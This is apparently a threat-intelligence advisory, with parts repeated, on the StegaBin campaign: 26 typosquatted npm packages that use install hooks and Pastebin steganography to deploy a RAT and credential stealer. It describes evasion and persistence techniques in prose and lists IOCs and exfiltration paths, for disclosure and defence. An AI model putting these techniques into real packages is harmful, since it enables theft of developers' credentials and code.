StegaBin: 26 Malicious npm Packages Use Pastebin Steganography to Deploy Credential Stealer
Summary:
The StegaBin campaign is a sophisticated software supply chain attack involving 26 malicious npm packages that deploy a multistage credential and secret harvesting operation targeting developers. The campaign is attributed to the North Korea-sponsored threat actor FAMOUS CHOLLIMA, which is closely associated with the Lazarus Group and the ongoing Contagious Interview campaigns. Attackers utilized typosquatting to deceive developers into downloading malicious packages, which subsequently resolved command and control infrastructure hidden within innocuous Pastebin essays via character-level steganography. Once installed, the malware automatically deploys a comprehensive nine-module infostealer and Remote Access Trojan toolkit tailored to developer environments. This campaign underscores a strategic focus on compromising developer workstations, allowing threat actors to achieve persistent access and exfiltrate sensitive source code, local credentials, and SSH keys. The breadth of typosquat targets suggests the campaign was not aimed at a specific technology stack but rather casting a wide net.
The attackers relied heavily on typosquatting widely used npm libraries such as express, fastify, and lodash. To increase credibility, eight of the 26 packages used a lint suffix to masquerade as standard developer tooling. Crucially, the malicious packages also declared the legitimate packages they were typosquatting as dependencies. This tactic allowed the victim's application to compile and run normally, delaying discovery while the infection chain executed silently in the background. The campaign also included a decoy dependency for Hardhat, an Ethereum smart contract framework, indicating a target profile of blockchain and Web3 developers.
The StegaBin infection chain begins with an npm install hook. The malicious packages declare an install script that runs automatically upon installation, utilizing decoy functions for camouflage. This script dynamically requires a heavily obfuscated payload located at a path designed to blend in as a vendored copy of a legitimate cryptographic library. This file acts as a sophisticated text steganography decoder. The decoder relies on three hardcoded Pastebin URLs that serve as a fallback chain. These URLs contain seemingly benign computer science essays. The malware strips zero-width Unicode characters, reads a length marker, calculates evenly spaced positions throughout the text, and extracts the hidden characters to reveal C2 domains. These decoded domains point to a resilient network of 31 distinct Vercel deployments used to host platform-specific shell payloads for macOS, Linux, and Windows.
Once the payload is retrieved, a token-gated bootstrapper takes over. The shell script accesses a Vercel domain using a single-use token and HTTP redirects, actively preventing automated security scanners from replicating the request. The bootstrapper ensures Node.js and Python are present on the host, downloads the primary RAT payload, installs dependencies, executes the RAT in the background, and then deletes itself to remove forensic artifacts. The RAT then connects to a dedicated C2 server on a specific port and awaits further instructions. Upon connection, the C2 server automatically deploys a massive nine-module infostealer toolkit designed to completely compromise the developer's workstation. For persistence, the malware modifies tasks.json to auto-run on folder open, utilizing 186 spaces to push the payload off-screen and silently reinfect the host with every session.
Suggested Corrections:
A full list of IOCs is available in Socket’s blog post.
https://socket.dev/blog/stegabin-26-malicious-npm-packages-use-pastebin-steganography
The StegaBin campaign is a sophisticated software supply chain attack involving 26 malicious npm packages that deploy a multistage credential and secret harvesting operation targeting developers. The campaign is attributed to the North Korea-sponsored threat actor FAMOUS CHOLLIMA, which is closely associated with the Lazarus Group and the ongoing Contagious Interview campaigns. Attackers utilized typosquatting to deceive developers into downloading malicious packages, which subsequently resolved command and control infrastructure hidden within innocuous Pastebin essays via character-level steganography. Once installed, the malware automatically deploys a comprehensive nine-module infostealer and Remote Access Trojan toolkit tailored to developer environments. This campaign underscores a strategic focus on compromising developer workstations, allowing threat actors to achieve persistent access and exfiltrate sensitive source code, local credentials, and SSH keys. The breadth of typosquat targets suggests the campaign was not aimed at a specific technology stack but rather casting a wide net.
- February 25 and 26, 2026: 26 malicious npm packages were published under individual throwaway accounts.
- February 26, 2026: Independent researcher Kieran Miyamoto disclosed 17 related packages.
- February 27, 2026: Socket threat researchers confirmed the campaign and detailed the live payload delivery.
The attackers relied heavily on typosquatting widely used npm libraries such as express, fastify, and lodash. To increase credibility, eight of the 26 packages used a lint suffix to masquerade as standard developer tooling. Crucially, the malicious packages also declared the legitimate packages they were typosquatting as dependencies. This tactic allowed the victim's application to compile and run normally, delaying discovery while the infection chain executed silently in the background. The campaign also included a decoy dependency for Hardhat, an Ethereum smart contract framework, indicating a target profile of blockchain and Web3 developers.
The StegaBin infection chain begins with an npm install hook. The malicious packages declare an install script that runs automatically upon installation, utilizing decoy functions for camouflage. This script dynamically requires a heavily obfuscated payload located at a path designed to blend in as a vendored copy of a legitimate cryptographic library. This file acts as a sophisticated text steganography decoder. The decoder relies on three hardcoded Pastebin URLs that serve as a fallback chain. These URLs contain seemingly benign computer science essays. The malware strips zero-width Unicode characters, reads a length marker, calculates evenly spaced positions throughout the text, and extracts the hidden characters to reveal C2 domains. These decoded domains point to a resilient network of 31 distinct Vercel deployments used to host platform-specific shell payloads for macOS, Linux, and Windows.
Once the payload is retrieved, a token-gated bootstrapper takes over. The shell script accesses a Vercel domain using a single-use token and HTTP redirects, actively preventing automated security scanners from replicating the request. The bootstrapper ensures Node.js and Python are present on the host, downloads the primary RAT payload, installs dependencies, executes the RAT in the background, and then deletes itself to remove forensic artifacts. The RAT then connects to a dedicated C2 server on a specific port and awaits further instructions. Upon connection, the C2 server automatically deploys a massive nine-module infostealer toolkit designed to completely compromise the developer's workstation. For persistence, the malware modifies tasks.json to auto-run on folder open, utilizing 186 spaces to push the payload off-screen and silently reinfect the host with every session.
Suggested Corrections:
A full list of IOCs is available in Socket’s blog post.
- Immediately blacklist the primary command and control IP address 103[.]106[.]67[.]63 on port 1244.
- Block network access to the 31 Vercel domains identified in the campaign (such as ext-checkdin[.]vercel[.]app) and the specific Pastebin URLs used as steganographic dead-drop resolvers.
- Scan all developer environments, node_modules directories, and CI/CD pipelines for the 26 specific typosquatted npm packages, paying special attention to packages with a "-lint" suffix like fastify-lint, expressjs-lint, and kafkajs-lint.
- Inspect developer workstations for modified tasks.json files within VSCode configuration directories. Specifically look for shell commands obfuscated by 186 spaces that attempt to curl or wget payloads from Vercel domains on folder open.
- Configure network monitoring tools to alert on HTTP POST requests targeting URI paths like /clipup and /uploads, which the malware uses to exfiltrate clipboard data and stolen secrets every 10 minutes.
- Verify Package Names: Train developers to rigorously verify npm package names before installation to avoid falling victim to typosquatting, especially since these malicious packages proxy legitimate libraries to delay discovery.
- Scrutinize Install Scripts: Implement policies to review or restrict packages that automatically execute scripts upon installation, as this campaign relies on an install script triggering a hidden payload.
- Deploy Automated Threat Detection: Utilize automated security tools capable of flagging malicious install-script behavior, obfuscated payload delivery, and anomalous vendored files.
- Monitor for Obfuscation Techniques: Implement code scanning rules to detect suspicious code patterns in project dependencies, such as RC4 string encryption, array rotation, self-defending anti-debug mechanisms, and control flow flattening.s
https://socket.dev/blog/stegabin-26-malicious-npm-packages-use-pastebin-steganography